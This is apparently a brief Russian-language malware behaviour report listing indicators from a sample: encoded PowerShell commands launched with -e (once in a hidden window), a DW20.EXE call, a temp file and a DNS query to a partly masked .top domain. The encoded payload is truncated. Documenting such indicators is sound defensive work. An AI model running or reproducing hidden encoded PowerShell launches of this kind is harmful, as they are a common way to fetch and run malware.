Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABaADQAMgAzADgAOAA2AD0AJwB6ADUAOAAxADUANAAwACcAOwAkAEIAMABfADQANwA0ADEAIAA9ACAAJwA3ADMAOQAnADsAJAB2ADEANAA2ADMAMgAxAD0AJwBKADQANgA1ADUAMQAnADsAJABSADYAMwAxADQANwA9ACQAZQBuAHYAOgB1AHMAZQB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1544
- %TEMP%\796541.cvr
- DNS ASK zu###rch.top
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABaADQAMgAzADgAOAA2AD0AJwB6ADUAOAAxADUANAAwACcAOwAkAEIAMABfADQANwA0ADEAIAA9ACAAJwA3ADMAOQAnADsAJAB2ADEANAA2ADMAMgAxAD0AJwBKADQANgA1ADUAMQAnADsAJABSADYAMwAxADQANwA9ACQAZQBuAHYAOgB1AHMAZQB...' (со скрытым окном)